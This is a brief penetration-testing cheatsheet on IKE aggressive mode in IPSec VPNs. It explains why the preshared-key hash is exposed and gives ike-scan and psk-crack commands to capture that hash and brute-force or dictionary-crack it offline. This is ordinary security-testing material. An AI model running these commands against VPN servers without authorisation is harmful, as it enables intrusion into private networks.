Adapted from slyth11907 / Cheatsheets / Cheatsheet_IKEScan.txt.
In IKE aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a VPN client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted (in main mode the hash is encrypted).
The ike-scan tool can be used to test if an IPSec VPN server is using IKE in aggressive mode:
sudo ike-scan -A $IP_ADDRESSIf aggressive mode is in use, then ike-scan can be used to save the initial exchange for offline cracking:
sudo ike-scan -A $IP_ADDRESS --id=$ID -P$KEY_FILEpsk-crack can then be used to (attempt) to crack the resulting $KEY_FILE.
# Attempt to brute-force all keys up to $KEY_LENGTH using
# characters from $CHARSET (by default $CHARSET is numbers and
# lowercase ASCII characters).
#
psk-crack --charset="$CHARSET" -b $KEY_LENGTH $KEY_FILE
# Attempt to crack the PSK using a dictionary.
#
psk-crack -d $WORDLIST_FILE $KEY_FILE